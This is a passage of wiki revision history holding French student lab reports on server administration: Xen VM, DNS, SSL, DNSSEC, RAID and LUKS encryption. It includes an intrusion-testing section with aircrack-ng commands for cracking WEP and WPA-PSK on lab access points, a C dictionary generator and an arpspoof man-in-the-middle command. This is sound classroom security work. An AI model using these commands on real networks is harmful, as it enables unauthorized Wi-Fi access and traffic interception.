&lt;br /&gt;
 cd /media/pifou/665....62/&lt;br /&gt;
&lt;br /&gt;
Nous avons créé un fichier test en sudo à la racine.&lt;br /&gt;
 &lt;br /&gt;
 sudo cryptsetup luksClose home &lt;br /&gt;
&lt;br /&gt;
Cette commande permet de fermer notre clé cryptée.&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation WiFi par WPA2-EAP ===&lt;br /&gt;
&lt;br /&gt;
== Site Web ==&lt;br /&gt;
&lt;br /&gt;
Achat de clavaire.site[https://www.clavaire.site] sur gandi&lt;br /&gt;
&lt;br /&gt;
Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.&lt;/div&gt;</summary>
		<author><name>Tmertz</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=54769</id>
		<title>TP sysres IMA5sc 2020/2021 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=54769"/>
				<updated>2020-12-16T13:08:05Z</updated>
		
		<summary type="html">&lt;p&gt;Tmertz : /* Installation VirtualMachine */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - SIMONIN/MERTZ - Clavaire&lt;br /&gt;
&lt;br /&gt;
== Informations générales ==&lt;br /&gt;
&lt;br /&gt;
 Hostname : Clavaire&lt;br /&gt;
 IP local : 100.64.0.25/28&lt;br /&gt;
 IP publique : 193.48.57.186/28&lt;br /&gt;
 URL : www.clavaire.site&lt;br /&gt;
&lt;br /&gt;
== Installation VirtualMachine ==&lt;br /&gt;
&lt;br /&gt;
Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Lancement de la VM puis connexion :&lt;br /&gt;
 xl create -c /etc/xen/clavaire.cfg&lt;br /&gt;
 xen console clavaire&lt;br /&gt;
&lt;br /&gt;
''Pour quitter la VM : CTRL + ]''&lt;br /&gt;
&lt;br /&gt;
On ajoute des disques à notre VM :&lt;br /&gt;
&lt;br /&gt;
 Rename disque et formatage (lvrename/mkfs)&lt;br /&gt;
 &lt;br /&gt;
 Modif .cfg pour ajouter disques&lt;br /&gt;
 &lt;br /&gt;
 Transfert fichier /var vers nouvelle partition&lt;br /&gt;
 &lt;br /&gt;
 Ajoute au /etc/fstab les disques&lt;br /&gt;
 &lt;br /&gt;
 Mount -a&lt;br /&gt;
&lt;br /&gt;
== Routage du site IPv4 ==&lt;br /&gt;
&lt;br /&gt;
Dans VM : /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.186&lt;br /&gt;
 netmask 255.255.255.255&lt;br /&gt;
 up ip address add dev eth0 100.64.0.26/24&lt;br /&gt;
 up ip route add default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
 down ip address del dev eth0 100.64.0.26/24&lt;br /&gt;
 down ip route del default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
&lt;br /&gt;
Dans gateway&lt;br /&gt;
&lt;br /&gt;
1. ssh zabeth09 et zabeth30&lt;br /&gt;
&lt;br /&gt;
2. minicom -&amp;gt; /dev/ttyACM0 et /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
3. enable&lt;br /&gt;
&lt;br /&gt;
4. conf t&lt;br /&gt;
&lt;br /&gt;
5. ip route 193.48.57.186 255.255.255.255 100.64.0.26&lt;br /&gt;
&lt;br /&gt;
6. exit&lt;br /&gt;
&lt;br /&gt;
7. write&lt;br /&gt;
&lt;br /&gt;
== Services Internet ==&lt;br /&gt;
=== SSH ===&lt;br /&gt;
modif /etc/ssh/sshd_config :&lt;br /&gt;
&lt;br /&gt;
 Changement port : PORT 2222&lt;br /&gt;
 Login depuis root : PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
service ssh restart&lt;br /&gt;
&lt;br /&gt;
on peut donc :&lt;br /&gt;
ssh root@193.48.57.186 -p 2222&lt;br /&gt;
&lt;br /&gt;
=== DNS ===&lt;br /&gt;
Ajout DNS :&lt;br /&gt;
&lt;br /&gt;
- le faire dans gandi&lt;br /&gt;
- modifier fichier /etc/bind/named.conf.local en ajoutant :&lt;br /&gt;
 zone &amp;quot;clavaire.site&amp;quot; IN {&lt;br /&gt;
 	type master;&lt;br /&gt;
 	file &amp;quot;/etc/bind/db.clavaire.lan&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
- puis avoir un ficher db.clavaire.lan :&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns1.clavaire.site. admin.clavaire.site. (&lt;br /&gt;
                               8         ; Serial&lt;br /&gt;
                          604800         ; Refresh&lt;br /&gt;
                           86400         ; Retry&lt;br /&gt;
                         2419200         ; Expire&lt;br /&gt;
                          604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.clavaire.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 @       IN      MX      100 clavaire.site.&lt;br /&gt;
 ns1     IN      A       193.48.57.186&lt;br /&gt;
 www     IN      A       193.48.57.186&lt;br /&gt;
&lt;br /&gt;
- relancer bind : &lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
- pour vérifier :&lt;br /&gt;
 host -tany clavaire.site&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation site web par certificat ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons créé un serveur apache2,&lt;br /&gt;
&lt;br /&gt;
 systemctl start apache2&lt;br /&gt;
&lt;br /&gt;
Nous avons ajouté à la liste des ports, le module ssl en écoute sur le port 443&lt;br /&gt;
&lt;br /&gt;
Ajout du certificat SSL&lt;br /&gt;
&lt;br /&gt;
Tout d'abord, nous avons installé openssl puis nous avons créé une nouvelle clé &lt;br /&gt;
&lt;br /&gt;
 La commande est disponible par mail: simoninrichard@gmail.com&lt;br /&gt;
 &lt;br /&gt;
Nous avons deplacé la clé dans private puis nous avons donné la clé public à Gandi pour générer le fichier&lt;br /&gt;
&lt;br /&gt;
Pour la sécurisation SSl, nous avons utilisé le un serveur mail sur notre VM, mailx.&lt;br /&gt;
&lt;br /&gt;
Pour notre serveur mail, nous avons configuré un chemin de sauvegarde de mail Maildir/, qui ne correspond pas au chemin courant.&lt;br /&gt;
&lt;br /&gt;
 mailx -f Maildir/&lt;br /&gt;
&lt;br /&gt;
Nous avons aussi ajouté un alias afin de recéptionner les mails en admin et non en root.&lt;br /&gt;
&lt;br /&gt;
A l'aide du serveur mail, nous avons pu valider les différentes etapes de validation SSL&lt;br /&gt;
&lt;br /&gt;
Nous devons ensuite activer nos certificats SSL&lt;br /&gt;
&lt;br /&gt;
 a2enmod ssl&lt;br /&gt;
&lt;br /&gt;
Ensuite nous avons modifié notre fichier de conf de notre site: clavaire.site.conf, pour ajouté nos chemins de fichiers de certificat SSL.&lt;br /&gt;
&lt;br /&gt;
Puis un petit restart et notre site est sécurisé.&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de serveur DNS par DNSSEC ===&lt;br /&gt;
&lt;br /&gt;
Nous avons suivi les différentes étapes du sujet de TP. Nous avons choisis comme nom de zone: clavaire.site.&lt;br /&gt;
&lt;br /&gt;
Nous avons vérifié le bon fonctionnement à l'aide de :&lt;br /&gt;
&lt;br /&gt;
 https://dnsviz.net/d/clavaire.site/dnssec/&lt;br /&gt;
&lt;br /&gt;
== Tests d’intrusion ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
 &lt;br /&gt;
Dans cette partie, nous avons utilisé le reseau cracotte03 avec un cryptage WEP.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous avons annalysé nos interfaces avec  &lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenue est&lt;br /&gt;
&lt;br /&gt;
 PHY	 Interface	Driver		Chipset&lt;br /&gt;
 phy0	wlx40a5ef0f6518	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
Nous obtenons ainsi l'interface de la clé WI-PI.&lt;br /&gt;
Nous démarrons notre interface réseau WIFI pour pouvoir commencer l'écoute sur le channel 3.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518 3&lt;br /&gt;
&lt;br /&gt;
Ainsi nous commençons à injecter dans notre réseau à l'aide du bssid de notre WIFI.&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -9 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Nous commençons à capturer les VI sur notre point d'accès à l'aide de la commande&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:52 -w test.txt wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
En même temps, nous effectuons des fausses authentification afin d'augmenter le traffic sur notre point d'accès&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52  wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Puis nous utilisons aircrack afin d'utiliser tous les Vi pour cracker la clé WEP&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:52 test*.cap &lt;br /&gt;
&lt;br /&gt;
et nous obtenons notre clé pour la cracotte03&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:00:0F:FF ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
=== Exploitation de failles du système === &lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons du trouvé le reseau wifi à cracker en scannant le reseau.&lt;br /&gt;
&lt;br /&gt;
Nous avons pu ainsi attendre une connexion sur le reseau pour récupérer un Handshake grace à airdump.&lt;br /&gt;
&lt;br /&gt;
Une fois les fichiers acquis, nous avons lancé sur un PC fixe plus puissant, la commande de crack par brute force.&lt;br /&gt;
&lt;br /&gt;
aircrack-ng -w fichierbruteforce.txt -b 00:24:0A:F2:C0:18 psk*.cap&lt;br /&gt;
&lt;br /&gt;
Code c pour générer le dictionnaire :&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     FILE *f;&lt;br /&gt;
     f = fopen(&amp;quot;fichierbruteforce.txt&amp;quot;,&amp;quot;w&amp;quot;);&lt;br /&gt;
     if(f==NULL){&lt;br /&gt;
         printf(&amp;quot;Erreur lors de l'ouverture c'un fichier&amp;quot;);&lt;br /&gt;
         exit(1);&lt;br /&gt;
     }&lt;br /&gt;
 &lt;br /&gt;
     for(char a=0; a&amp;lt;10;a++)&lt;br /&gt;
     {&lt;br /&gt;
         for(char z=0; z&amp;lt;10;z++)&lt;br /&gt;
         {&lt;br /&gt;
             for(char e=0; e&amp;lt;10;e++)&lt;br /&gt;
             {&lt;br /&gt;
                 for(char r=0; r&amp;lt;10;r++)&lt;br /&gt;
                 {&lt;br /&gt;
                     for(char t=0; t&amp;lt;10;t++)&lt;br /&gt;
                     {&lt;br /&gt;
                         for(char y=0; y&amp;lt;10;y++)&lt;br /&gt;
                         {&lt;br /&gt;
                             for(char u=0; u&amp;lt;10;u++)&lt;br /&gt;
                             {&lt;br /&gt;
                                 for(char i=0; i&amp;lt;10;i++)&lt;br /&gt;
                                 {&lt;br /&gt;
                                     //printf(&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                     fprintf(f,&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                 }&lt;br /&gt;
                             }&lt;br /&gt;
                         }&lt;br /&gt;
                     }&lt;br /&gt;
                 }&lt;br /&gt;
             }&lt;br /&gt;
         }&lt;br /&gt;
     }&lt;br /&gt;
     fclose(f);&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
=== Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP ===&lt;br /&gt;
&lt;br /&gt;
L'objectif de cette manipulation est de nous faire passer pour un utilisateur de notre reseau au près d'un serveur web.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous devons modifier la valeur de la variable pour passer en mode routeur,&lt;br /&gt;
&lt;br /&gt;
 sysctl -w net.ipv4.ip_forward=1&lt;br /&gt;
&lt;br /&gt;
Nous commencons ainsi le piratage,&lt;br /&gt;
&lt;br /&gt;
attacker@attacker:~/ arpspoof -i enp0s3 -t 192.168.1.74 193.48.57.186&lt;br /&gt;
&lt;br /&gt;
=== Intrusion sur un serveur d’application Web ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Réalisations ==&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de données ===&lt;br /&gt;
&lt;br /&gt;
On crée 3 disques virtuel de 1G (lvcreate -L1G -nclavaire-raid1 storage) et on les ajoute au fichier de config.&lt;br /&gt;
On peut créer le raid :&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvda5 /dev/xvda6 /dev/xvda7&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
Pour qu'il soit monté a chaque démarrage de la vm : &lt;br /&gt;
 mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
&lt;br /&gt;
Et on l'ajoute au fichier /etc/fstab&lt;br /&gt;
&lt;br /&gt;
Avec des fichiers dans le ce volume, meme si un disque est déconnecté, les données sont toujours disponible.&lt;br /&gt;
&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous formatons notre clé USB afin de pouvoir utiliser les partitions:&lt;br /&gt;
&lt;br /&gt;
 df -h&lt;br /&gt;
&lt;br /&gt;
Nous connaissons ainsi notre Filesystem:&lt;br /&gt;
&lt;br /&gt;
 fdisk /dev/sdb&lt;br /&gt;
&lt;br /&gt;
Nous pouvons créer une nouvelle partition primaire de la taille de la clé USB, 7.2 Go.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous quittons fdisk mais nous devons exécuter la commande&lt;br /&gt;
&lt;br /&gt;
 partprobe &lt;br /&gt;
&lt;br /&gt;
Pour re-écrire dans la table de partition.&lt;br /&gt;
&lt;br /&gt;
Nous commençons l'initialisations de notre clé cryptée &lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksFormat  /dev/sdb1&lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksOpen /dev/sdb1 home&lt;br /&gt;
&lt;br /&gt;
Nous pouvons accéder à notre clé depuis &lt;br /&gt;
&lt;br /&gt;
 cd /media/pifou/665....62/&lt;br /&gt;
&lt;br /&gt;
Nous avons créé un fichier test en sudo à la racine.&lt;br /&gt;
 &lt;br /&gt;
 sudo cryptsetup luksClose home &lt;br /&gt;
&lt;br /&gt;
Cette commande permet de fermer notre clé cryptée.&lt;br /&gt;
&lt;br /&gt;
== Site Web ==&lt;br /&gt;
&lt;br /&gt;
Achat de clavaire.site[https://www.clavaire.site] sur gandi&lt;br /&gt;
&lt;br /&gt;
Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.&lt;/div&gt;</summary>
		<author><name>Tmertz</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=54201</id>
		<title>TP sysres IMA5sc 2020/2021 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=54201"/>
				<updated>2020-11-30T17:27:52Z</updated>
		
		<summary type="html">&lt;p&gt;Tmertz : /* Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - SIMONIN/MERTZ - Clavaire&lt;br /&gt;
&lt;br /&gt;
== Informations générales ==&lt;br /&gt;
&lt;br /&gt;
 Hostname : Clavaire&lt;br /&gt;
 IP local : 100.64.0.25/28&lt;br /&gt;
 IP publique : 193.48.57.186/28&lt;br /&gt;
 URL : www.clavaire.site&lt;br /&gt;
&lt;br /&gt;
== Installation VirtualMachine ==&lt;br /&gt;
&lt;br /&gt;
Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Lancement de la VM puis connexion :&lt;br /&gt;
 xl create -c /etc/xen/clavaire.cfg&lt;br /&gt;
 xen console clavaire&lt;br /&gt;
&lt;br /&gt;
''Pour quitter la VM : CTRL + ]''&lt;br /&gt;
&lt;br /&gt;
On ajoute des disques à notre VM :&lt;br /&gt;
&lt;br /&gt;
//rename disque et formatage (lvrename/mkfs)&lt;br /&gt;
&lt;br /&gt;
//modif .cfg pour ajouter disques&lt;br /&gt;
&lt;br /&gt;
//transfert fichier /var vers nouvelle partition&lt;br /&gt;
&lt;br /&gt;
//ajoute au /etc/fstab les disques&lt;br /&gt;
&lt;br /&gt;
//mount -a&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Routage du site IPv4 ==&lt;br /&gt;
&lt;br /&gt;
Dans VM : /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.186&lt;br /&gt;
 netmask 255.255.255.255&lt;br /&gt;
 up ip address add dev eth0 100.64.0.26/24&lt;br /&gt;
 up ip route add default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
 down ip address del dev eth0 100.64.0.26/24&lt;br /&gt;
 down ip route del default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
&lt;br /&gt;
Dans gateway&lt;br /&gt;
&lt;br /&gt;
1. ssh zabeth09 et zabeth30&lt;br /&gt;
&lt;br /&gt;
2. minicom -&amp;gt; /dev/ttyACM0 et /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
3. enable&lt;br /&gt;
&lt;br /&gt;
4. conf t&lt;br /&gt;
&lt;br /&gt;
5. ip route 193.48.57.186 255.255.255.255 100.64.0.26&lt;br /&gt;
&lt;br /&gt;
6. exit&lt;br /&gt;
&lt;br /&gt;
7. write&lt;br /&gt;
&lt;br /&gt;
== Services Internet ==&lt;br /&gt;
=== SSH ===&lt;br /&gt;
modif /etc/ssh/sshd_config :&lt;br /&gt;
&lt;br /&gt;
 Changement port : PORT 2222&lt;br /&gt;
 Login depuis root : PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
service ssh restart&lt;br /&gt;
&lt;br /&gt;
on peut donc :&lt;br /&gt;
ssh root@193.48.57.186 -p 2222&lt;br /&gt;
&lt;br /&gt;
=== DNS ===&lt;br /&gt;
Ajout DNS :&lt;br /&gt;
&lt;br /&gt;
- le faire dans gandi&lt;br /&gt;
- modifier fichier /etc/bind/named.conf.local en ajoutant :&lt;br /&gt;
 zone &amp;quot;clavaire.site&amp;quot; IN {&lt;br /&gt;
 	type master;&lt;br /&gt;
 	file &amp;quot;/etc/bind/db.clavaire.lan&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
- puis avoir un ficher db.clavaire.lan :&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns1.clavaire.site. admin.clavaire.site. (&lt;br /&gt;
                               8         ; Serial&lt;br /&gt;
                          604800         ; Refresh&lt;br /&gt;
                           86400         ; Retry&lt;br /&gt;
                         2419200         ; Expire&lt;br /&gt;
                          604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.clavaire.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 @       IN      MX      100 clavaire.site.&lt;br /&gt;
 ns1     IN      A       193.48.57.186&lt;br /&gt;
 www     IN      A       193.48.57.186&lt;br /&gt;
&lt;br /&gt;
- relancer bind : &lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
- pour vérifier :&lt;br /&gt;
 host -tany clavaire.site&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation site web par certificat ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons créé un serveur apache2,&lt;br /&gt;
&lt;br /&gt;
 systemctl start apache2&lt;br /&gt;
&lt;br /&gt;
Nous avons ajouté à la liste des ports, le module ssl en écoute sur le port 443&lt;br /&gt;
&lt;br /&gt;
Ajout du certificat SSL&lt;br /&gt;
&lt;br /&gt;
Tout d'abord, nous avons installé openssl puis nous avons créé une nouvelle clé &lt;br /&gt;
&lt;br /&gt;
 La commande est disponible par mail: simoninrichard@gmail.com&lt;br /&gt;
 &lt;br /&gt;
Nous avons deplacé la clé dans private puis nous avons donné la clé public à Gandi pour générer le fichier&lt;br /&gt;
&lt;br /&gt;
Pour la sécurisation SSl, nous avons utilisé le un serveur mail sur notre VM, mailx.&lt;br /&gt;
&lt;br /&gt;
Pour notre serveur mail, nous avons configuré un chemin de sauvegarde de mail Maildir/, qui ne correspond pas au chemin courant.&lt;br /&gt;
&lt;br /&gt;
 mailx -f Maildir/&lt;br /&gt;
&lt;br /&gt;
Nous avons aussi ajouté un alias afin de recéptionner les mails en admin et non en root.&lt;br /&gt;
&lt;br /&gt;
A l'aide du serveur mail, nous avons pu valider les différentes etapes de validation SSL&lt;br /&gt;
&lt;br /&gt;
Nous devons ensuite activer nos certificats SSL&lt;br /&gt;
&lt;br /&gt;
 a2enmod ssl&lt;br /&gt;
&lt;br /&gt;
Ensuite nous avons modifié notre fichier de conf de notre site: clavaire.site.conf, pour ajouté nos chemins de fichiers de certificat SSL.&lt;br /&gt;
&lt;br /&gt;
Puis un petit restart et notre site est sécurisé.&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de serveur DNS par DNSSEC ===&lt;br /&gt;
&lt;br /&gt;
Nous avons suivi les différentes étapes du sujet de TP. Nous avons choisis comme nom de zone: clavaire.site.&lt;br /&gt;
&lt;br /&gt;
Nous avons vérifié le bon fonctionnement à l'aide de :&lt;br /&gt;
&lt;br /&gt;
 https://dnsviz.net/d/clavaire.site/dnssec/&lt;br /&gt;
&lt;br /&gt;
== Tests d’intrusion ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
 &lt;br /&gt;
Dans cette partie, nous avons utilisé le reseau cracotte03 avec un cryptage WEP.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous avons annalysé nos interfaces avec  &lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenue est&lt;br /&gt;
&lt;br /&gt;
 PHY	 Interface	Driver		Chipset&lt;br /&gt;
 phy0	wlx40a5ef0f6518	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
Nous obtenons ainsi l'interface de la clé WI-PI.&lt;br /&gt;
Nous démarrons notre interface réseau WIFI pour pouvoir commencer l'écoute sur le channel 3.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518 3&lt;br /&gt;
&lt;br /&gt;
Ainsi nous commençons à injecter dans notre réseau à l'aide du bssid de notre WIFI.&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -9 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Nous commençons à capturer les VI sur notre point d'accès à l'aide de la commande&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:52 -w test.txt wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
En même temps, nous effectuons des fausses authentification afin d'augmenter le traffic sur notre point d'accès&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52  wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Puis nous utilisons aircrack afin d'utiliser tous les Vi pour cracker la clé WEP&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:52 test*.cap &lt;br /&gt;
&lt;br /&gt;
et nous obtenons notre clé pour la cracotte03&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:00:0F:FF ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
=== Exploitation de failles du système === &lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons du trouvé le reseau wifi à cracker en scannant le reseau.&lt;br /&gt;
&lt;br /&gt;
Nous avons pu ainsi attendre une connexion sur le reseau pour récupérer un Handshake grace à airdump.&lt;br /&gt;
&lt;br /&gt;
Une fois les fichiers acquis, nous avons lancé sur un PC fixe plus puissant, la commande de crack par brute force.&lt;br /&gt;
&lt;br /&gt;
aircrack-ng -w fichierbruteforce.txt -b 00:24:0A:F2:C0:18 psk*.cap&lt;br /&gt;
&lt;br /&gt;
Code c pour générer le dictionnaire :&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     FILE *f;&lt;br /&gt;
     f = fopen(&amp;quot;fichierbruteforce.txt&amp;quot;,&amp;quot;w&amp;quot;);&lt;br /&gt;
     if(f==NULL){&lt;br /&gt;
         printf(&amp;quot;Erreur lors de l'ouverture c'un fichier&amp;quot;);&lt;br /&gt;
         exit(1);&lt;br /&gt;
     }&lt;br /&gt;
 &lt;br /&gt;
     for(char a=0; a&amp;lt;10;a++)&lt;br /&gt;
     {&lt;br /&gt;
         for(char z=0; z&amp;lt;10;z++)&lt;br /&gt;
         {&lt;br /&gt;
             for(char e=0; e&amp;lt;10;e++)&lt;br /&gt;
             {&lt;br /&gt;
                 for(char r=0; r&amp;lt;10;r++)&lt;br /&gt;
                 {&lt;br /&gt;
                     for(char t=0; t&amp;lt;10;t++)&lt;br /&gt;
                     {&lt;br /&gt;
                         for(char y=0; y&amp;lt;10;y++)&lt;br /&gt;
                         {&lt;br /&gt;
                             for(char u=0; u&amp;lt;10;u++)&lt;br /&gt;
                             {&lt;br /&gt;
                                 for(char i=0; i&amp;lt;10;i++)&lt;br /&gt;
                                 {&lt;br /&gt;
                                     //printf(&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                     fprintf(f,&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                 }&lt;br /&gt;
                             }&lt;br /&gt;
                         }&lt;br /&gt;
                     }&lt;br /&gt;
                 }&lt;br /&gt;
             }&lt;br /&gt;
         }&lt;br /&gt;
     }&lt;br /&gt;
     fclose(f);&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
=== Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP ===&lt;br /&gt;
&lt;br /&gt;
L'objectif de cette manipulation est de nous faire passer pour un utilisateur de notre reseau au près d'un serveur web.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous devons modifier la valeur de la variable pour passer en mode routeur,&lt;br /&gt;
&lt;br /&gt;
 sysctl -w net.ipv4.ip_forward=1&lt;br /&gt;
&lt;br /&gt;
Nous commencons ainsi le piratage,&lt;br /&gt;
&lt;br /&gt;
attacker@attacker:~/ arpspoof -i enp0s3 -t 192.168.1.74 193.48.57.186&lt;br /&gt;
&lt;br /&gt;
=== Intrusion sur un serveur d’application Web ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Réalisations ==&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de données ===&lt;br /&gt;
&lt;br /&gt;
On crée 3 disques virtuel de 1G (lvcreate -L1G -nclavaire-raid1 storage) et on les ajoute au fichier de config.&lt;br /&gt;
On peut créer le raid :&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvda5 /dev/xvda6 /dev/xvda7&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
Pour qu'il soit monté a chaque démarrage de la vm : &lt;br /&gt;
 mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
&lt;br /&gt;
Et on l'ajoute au fichier /etc/fstab&lt;br /&gt;
&lt;br /&gt;
Avec des fichiers dans le ce volume, meme si un disque est déconnecté, les données sont toujours disponible.&lt;br /&gt;
&lt;br /&gt;
